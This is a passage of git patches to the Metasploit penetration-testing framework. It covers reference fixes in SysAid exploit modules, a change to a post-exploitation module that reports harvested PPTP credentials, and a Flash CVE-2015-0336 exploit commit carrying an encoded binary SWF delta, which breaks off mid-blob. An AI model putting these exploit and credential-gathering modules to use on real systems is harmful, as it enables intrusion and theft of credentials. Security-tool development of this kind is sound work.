Subject: [PATCH 0298/1013] Update sysaid_admin_acct.rb

---
 modules/auxiliary/admin/http/sysaid_admin_acct.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
index 08e764db8e..46958e7276 100644
--- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb
+++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'CVE', 'CVE-2015-2993' ],
+          [ 'CVE', '2015-2993' ],
           [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
           [ 'URL', 'TODO_FULLDISC_URL' ]

From 54bfe2952718a1b38a65324feba1c0937c569ec4 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 21:59:45 +0100
Subject: [PATCH 0299/1013] Update and rename sysaid_file_ to
 sysaid_file_download.rb

---
 .../admin/http/{sysaid_file_ => sysaid_file_download.rb}    | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
 rename modules/auxiliary/admin/http/{sysaid_file_ => sysaid_file_download.rb} (97%)

diff --git a/modules/auxiliary/admin/http/sysaid_file_ b/modules/auxiliary/admin/http/sysaid_file_download.rb
similarity index 97%
rename from modules/auxiliary/admin/http/sysaid_file_
rename to modules/auxiliary/admin/http/sysaid_file_download.rb
index 38bd0f6af7..b331514831 100644
--- a/modules/auxiliary/admin/http/sysaid_file_
+++ b/modules/auxiliary/admin/http/sysaid_file_download.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -30,8 +30,8 @@ class Metasploit3 < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'CVE', 'CVE-2015-2996' ],
-          [ 'CVE', 'CVE-2015-2997' ],
+          [ 'CVE', '2015-2996' ],
+          [ 'CVE', '2015-2997' ],
           [ 'OSVDB', 'TODO' ],
           [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],

From 7f35c3b4f513a80b79ec67e10ff4566956cd26e9 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 22:00:08 +0100
Subject: [PATCH 0300/1013] Update sysaid_sql_creds.rb

---
 modules/auxiliary/admin/http/sysaid_sql_creds.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
index d059b7861f..de1024a397 100644
--- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb
+++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
@@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'CVE', 'CVE-2015-2996' ],
-          [ 'CVE', 'CVE-2015-2998' ],
+          [ 'CVE', '2015-2996' ],
+          [ 'CVE', '2015-2998' ],
           [ 'OSVDB', 'TODO' ],
           [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],

From 37827be10f096a19609080a5db08ea45f8e8a71c Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 22:00:44 +0100
Subject: [PATCH 0301/1013] Update sysaid_auth_file_upload.rb

---
 modules/exploits/multi/http/sysaid_auth_file_upload.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
index 68be18ebf4..3f8868ba57 100644
--- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', 'CVE-2015-2994' ],
+          [ 'CVE', '2015-2994' ],
           [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
           [ 'URL', 'TODO_FULLDISC_URL' ]

From d5b33a00743a4f2ebd78ce3907d26c4584205845 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 22:01:13 +0100
Subject: [PATCH 0302/1013] Update sysaid_rdslogs_fle_upload.rb

---
 modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index 752e9ec7fd..ce3fa0d722 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', 'CVE-2015-2995' ],
+          [ 'CVE', '2015-2995' ],
           [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
           [ 'URL', 'FULLDISC_URL' ]

From 39d38f1641acbd4720dbf2746554782a634f663c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 3 Jun 2015 16:33:10 -0500
Subject: [PATCH 0303/1013] Update pptpd_chap_secrets to use the new cred API

---
 .../post/linux/gather/pptpd_chap_secrets.rb   | 45 +++++++++++++++----
 1 file changed, 36 insertions(+), 9 deletions(-)

diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb
index 04ef8c1a3d..cbdbfb31dd 100644
--- a/modules/post/linux/gather/pptpd_chap_secrets.rb
+++ b/modules/post/linux/gather/pptpd_chap_secrets.rb
@@ -53,6 +53,34 @@ class Metasploit3 < Msf::Post
   end
 
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   #
   # Extracts client, server, secret, and IP addresses
   #
@@ -77,15 +105,14 @@ class Metasploit3 < Msf::Post
       secret = (found[2] || '').strip
       ip     = (found[3,found.length] * ", " || '').strip
 
-      report_auth_info({
-        :host   => session.session_host,
-        :port   => 1723, #PPTP port
-        :sname  => 'pptp',
-        :user   => client,
-        :pass   => secret,
-        :type   => 'password',
-        :active => true
-      })
+      report_cred(
+        ip: session.session_host,
+        port: 1723, # PPTP port
+        service_name: 'pptp',
+        user: client,
+        password: secret,
+
+      )
 
       tbl << [client, server, secret, ip]
     end

From 74117a7a5220efb4cfaa14221c1531cd53c75545 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 3 Jun 2015 16:33:41 -0500
Subject: [PATCH 0304/1013] Allow to execute payload from the flash renderer

---
 data/exploits/CVE-2015-0336/msf.swf           | Bin 20599 -> 20776 bytes
 data/exploits/CVE-2015-0336/trigger.swf       | Bin 340 -> 339 bytes
 .../source/exploits/CVE-2015-0336/Exploit.as  |  19 ++--
 .../CVE-2015-0336/ExploitByteArray.as         |   9 +-
 .../exploits/CVE-2015-0336/Exploiter.as       | 105 +++++++++++++++---
 external/source/exploits/CVE-2015-0336/PE.as  |  15 ++-
 .../CVE-2015-0336/Trigger/src/Main.as         |   2 +-
 .../adobe_flash_net_connection_confusion.rb   |  20 ++--
 8 files changed, 128 insertions(+), 42 deletions(-)

diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf
index c014a3ef20856c4d1e2997a15ca1c484c113160c..f8492e42e8860d9a9da45cb2b6712a3a493fb098 100644
GIT binary patch
delta 20657
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
